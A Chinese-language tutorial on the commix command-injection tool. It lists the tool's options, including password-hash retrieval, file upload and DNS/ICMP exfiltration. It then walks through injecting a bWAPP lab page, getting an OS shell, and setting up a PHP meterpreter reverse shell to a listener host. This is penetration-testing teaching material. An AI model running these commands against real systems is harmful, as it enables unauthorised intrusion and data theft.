commix简介

commix是一款由python编写,开源自动化检测系统命令注入工具  https://github.com/commixproject/commix

commix 参数

选项：
    -v 　　　　　　　　　　VERBOSE详细程度级别（0-1，默认值：0）。
    --version　　　　 　　显示版本号并退出。
    --output-dir=.. 　　设置自定义输出目录路径。
    -s SESSION_FILE　　 从存储（.sqlite）文件加载会话。
    --flush-session　　 刷新当前目标的会话文件。
    --ignore-session　　忽略存储在会话文件中的结果。
  目标：
    -u URL，--url = URL　　目标URL。
    --url-reload　　　　　　在命令执行后重新加载目标URL。
    -l LOGFILE　　　　　　　解析来自HTTP代理日志文件的目标和数据。
    --crawl = CRAWLDEPTH  从目标网址开始抓取网站（1-2，默认值：0）。
  请求：
    --data=DATA　　　　　　要通过POST发送的数据字符串。
    --host=HOST 　　　　　 HTTP主机头。
    --referer=REFERER 　　HTTP Referer标头。
    --user-agent=AGENT 　HTTP用户代理头。
    --random-agent　　　　使用随机选择的HTTP User-Agent头。
    --param-del=PDEL　　 设置分割参数值的字符。
    --cookie=COOKIE 　　 HTTP Cookie头。
    --cookie-del=CDEL 　 设置分割cookie值的字符。
    --headers=HEADERS　  额外标头（例如「Header1：Value1 \ nHeader2：Value2」）。
    --proxy=PROXY　　　　 使用HTTP代理（例如“127.0.0.1:8080”）。
    --tor　　　　　　　　　 使用Tor网络。
    --tor-port=...  　　  设置Tor代理端口（默认值：8118）。
    --auth-url=...　　　  登录面板URL。
    --auth-data =AUTH 　　登录参数和数据。
    --auth-type =AUTH 　　HTTP认证类型（例如“基本”或“摘要”）。
    --auth-cred =AUTH 　　HTTP身份验证凭据（例如“admin：admin”）。
    --ignore-401　　　　　 忽略HTTP错误401（未授权）。
    --force-ssl　　　　　　强制使用SSL / HTTPS。
  枚举：
    这些选项可用于枚举目标主机。
    --all　　　　　　　　　　　　检索一切。
    --current-user　　　　　　 检索当前用户名。
    --hostname　　　　　　　　　检索当前主机名。
    --is-root　　　　　　　　　 检查当前用户是否具有root权限。
    --is-admin　　　　　　　　　检查当前用户是否具有管理员权限。
    --sys-info　　　　　　　　　检索系统信息。
    --users　　　　　　　　　　 检索系统用户。
    --passwords　　　　　　　　 检索系统用户密码散列。
    --privileges　　　　　　　 检索系统用户权限。
    --ps-version　　　　　　　 检索PowerShell的版本号。
  文件访问：
    这些选项可用于访问目标主机上的文件。
    --file-read = FILE ..　　从目标主机读取文件。
    --file-write = FIL ..　　写入目标主机上的文件。
    --file-upload = FI ..　　在目标主机上上传文件。
    --file-dest = FILE ..　　写入和/或上传到的主机的绝对文件路径。
  模块：
    这些选项可用于增加检测和/或注射能力。
    --icmp-exfil = IP_ ..'ICMP exfiltration'注入模块。  （例如'ip_src = 192.168.178.1，ip_dst = 192.168.178.3'）。
    --dns-server = DNS ..“DNS exfiltration”注入模块。　　（用于DNS筛选攻击的域名）。
    --shellshock“炮弹”注射模块。
  注射：
    这些选项可用于指定要插入和输入的参数,提供定制注入有效负载。
    -p TEST_PARAMETER　　　　可测试参数。
    --suffix = SUFFIX　　　　注入有效负载后缀字符串。
    --prefix = PREFIX　　　　注入有效负载前缀字符串。
    --technique = TECH　　　指定要使用的进样技术。
    --maxlen = MAXLEN　　　 设置与时间相关的最大输出长度,注射技术（默认：10000字符）。
    --delay = DELAY　　　　 设置与时间相关的注入的自定义时间延迟术（默认：1秒）。
    --tmp-path = TMP_P ..  设置Web服务器的临时目录的绝对路径。
    --root-dir = SRV_R ..  设置Web服务器根目录的绝对路径。
    --alter-shell = AL ..  使用另一个os-shell（例如'Python'）。
    --os-cmd = OS_CMD　　　 执行单个操作系统命令。
    --os = OS　　　　　　　　将后端操作系统强制为此值。
    --tamper = TAMPER　　　使用给定脚本篡改注射数据。
  检测：
    这些选项可用于自定义检测阶段。
    --level = LEVEL　　要执行的测试级别（1-3，默认值：1）。
    --skip-calc　　　　在检测期间跳过数学计算
    --dependencies　　检查第三方（非内核）依赖关系。
    --skip-waf　　　　绕过启发式检测WAF / IPS / IDS保护。

演示

POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.1.103
Referer: http://192.168.1.103/bWAPP/commandi.php
Cookie: acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=mq78064h3p2b00n4toerk7ana1; security_level=0

target=www.nsa.gov&form=submit

commix注入

~# commix --url "http://192.168.1.103/bWAPP/commandi.php" --cookie="acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=mq78064h3p2b00n4toerk7ana1; security_level=0" --data="target=www.nsa.gov&form=submit"

询问是否想要一个shell 输入Y 的到shell

[?] Do you want a Pseudo-Terminal shell? [Y/n] > y

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > 

得到shell

commix(os_shell) > pwd

/owaspbwa/bwapp-git/bWAPP

commix(os_shell) > id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

commix(os_shell) > ls -ll 

可以进行反弹shell 结合metasploit 进行内网渗透

commix(os_shell) > reverse_tcp  
commix(reverse_tcp) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
commix(reverse_tcp) > set LPORT 4444
LPORT => 4444
   
---[ Reverse TCP shells ]---     
Type '1' to use a netcat reverse TCP shell.
Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2 

---[ Unix-like reverse TCP shells ]---
Type '1' to use a PHP reverse TCP shell.
Type '2' to use a Perl reverse TCP shell.
Type '3' to use a Ruby reverse TCP shell. 
Type '4' to use a Python reverse TCP shell.
Type '5' to use a Socat reverse TCP shell.
Type '6' to use a Bash reverse TCP shell.
Type '7' to use a Ncat reverse TCP shell.

---[ Meterpreter reverse TCP shells ]---
Type '8' to use a PHP meterpreter reverse TCP shell.
Type '9' to use a Python meterpreter reverse TCP shell. 
Type '10' to use a Windows meterpreter reverse TCP shell. 
Type '11' to use the web delivery script. 

commix(reverse_tcp_other) > 8
[*] Generating the 'php/meterpreter/reverse_tcp' payload... [ SUCCEED ]
[*] Type "msfconsole -r /usr/share/commix/php_meterpreter.rc" (in a new window). #复制 启动msf
[*] Once the loading is done, press here any key to continue...  #按下确定建就可进行在msf接收到反弹的shell
[+] Everything is in place, cross your fingers and wait for a shell!